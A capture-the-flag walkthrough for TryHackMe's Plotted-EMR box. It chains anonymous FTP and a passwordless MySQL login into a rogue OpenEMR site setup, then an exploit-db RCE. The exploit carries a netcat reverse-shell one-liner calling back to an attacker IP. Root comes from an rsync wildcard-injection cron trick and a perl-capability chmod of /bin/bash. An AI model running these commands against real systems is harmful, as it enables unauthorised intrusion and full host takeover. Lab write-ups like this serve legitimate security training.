Plotted-EMR – Walkthrough En | TryHackMe – Write-up

Everything here is plotted!

Plotted-EMR is a hard box from TryHackMe. The initial is very good. You have to think et put the pieces together!!! After, it’s classic privesc. 

 

infosec_related

Tags

Enumeration

Command :

nmap -sV -sC -T5 10.10.207.74

 

Nmap shows us 5 open ports. It is necessary for each of them to enumerate them. We’ll start with the FTP service.

FTP enumeration

Access to the FTP service is done with the anonymous account.

You have to look and see .- then and finally download the file you_are_determined.txt with the command :

mget you_are_determined.txt

Reading the file you_are_determined.txt :

cat you_are_determined.txt

We get a clue. There is a service that works with the account admin. Remains to know which one?

Enumeration MariaDB - Mysql

Nmap already gave us the version. We will try to connect to the service with the admin account.

Command :

mysql -u admin -h 10.10.207.74 -P 5900

Access is possible without a password. On the other hand, there is nothing interesting inside the bases.

Web enumeration.

Port 80

dirsearch -u 10.10.207.74 -x 403

 

/admin

We land on a page with a base64 encoded string, apparently.

/passwd

Same thing in his directory

 

The two elements are only rabbitholes

dGhpcyBtaWdodCBiZSBhIHVzZXJuYW1l    === this might be a username

aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ==  === https://www.youtube.com/watch?v=dQw4w9WgXcQ

 

Port 8890

Commande :

dirsearch -u 10.10.207.74 :8890-x 403

We get several interesting directories.

 

/portal

We land on a login page

 

Vulnerability on Plotted-EMR

By performing a search on Google, it appears that versions 5.0.2.1, 5.0.1.3 are vulnerable. You have to be authenticated. We must therefore find a way to log in to the interface.

First, we will parse the website again only on /portal this time.

Command :

dirsearch -u 10.10.207.74 :8890/portal -x 403

There is a setup.php page which apparently allows us to set up a new site. After some google research, there is also another page admin.php which gives us other information.

Previous
Next

Creation of a new site

This is not a very simple feat to set up. You have to think about and remember the accesses that you have found before. It took me a long time to understand…

You have to put a name to the site and continue

Continue

Take the choice: Have setup create the database

 

And finally we arrive at the configuration page of the new site.

Les informations à modifier :

MYSQL SERVER:

server host : 10.10.207.74

Server Port: 5900

Login Name: newuser

Password: whatever you want

Name for Root Account: admin ( this is the account with which we connected to the sql database )

OPENEMR USER:

Initial User: newsadmin

Initial User Password: whatever you want

 

Be careful, after clicking on continue, it can take up to 1 minute to get to the next step.

 
Previous
Next

Access to the new site

http://10.10.137.248:8890/portal/?site=newone

Initial foothold

Now that we have identifiers to connect to the OpenEmr application. It is possible to use the available exploits that allow you to obtain an RCE.

Exploit to use : https://www.exploit-db.com/exploits/45161

Line 66 needs to be changed. You have to put the name of the new site.

 

Command to launch the exploit :

python2.7 45161.py -u admin -p password -c ‘rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f’ http://10.10.137.4:8890/portal/

 

Enumération local - cron task - elevation dofprivilege 1

Linpeas shows us a scheduled task that runs every minute.

There is a wildcard in the command line. This can be used to elevate privileges. As the script will save all the elements ( * ) present in config. We will create a file in this folder which will force rsync to execute the command that we insert.

Command :

cd /var/www/html/portal/config

echo “cp /bin/bash /home/plot_admin/ shell; chmod +s /home/plot_admin/shell” > shell.sh

touch — “-e sh shell.sh”

Once the scheduled task has been executed, you must go to the /home/plot_admin folder and execute the new bash.

Command :

./shell -p

 

Privilege escalation - capabilities

Linpeas had already shown it. Perl has capabilities. The website gtfobins explains how to elevate privileges to root.

Command : 

getcap -r / 2>/dev/null

Commande original de gtfobins : 

./perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’

Commande modifiée : 

/usr/bin/perl -e ‘chmod 7777, “/bin/bash”‘

/bin/bash -p

#

 

That’s all folks

Thank you for taking the trouble to come to the site to read this Write Up

I hope he has more of you and that he taught you new things.

Feel free to leave a comment or share this article.

Facebook
Twitter
LinkedIn
Pinterest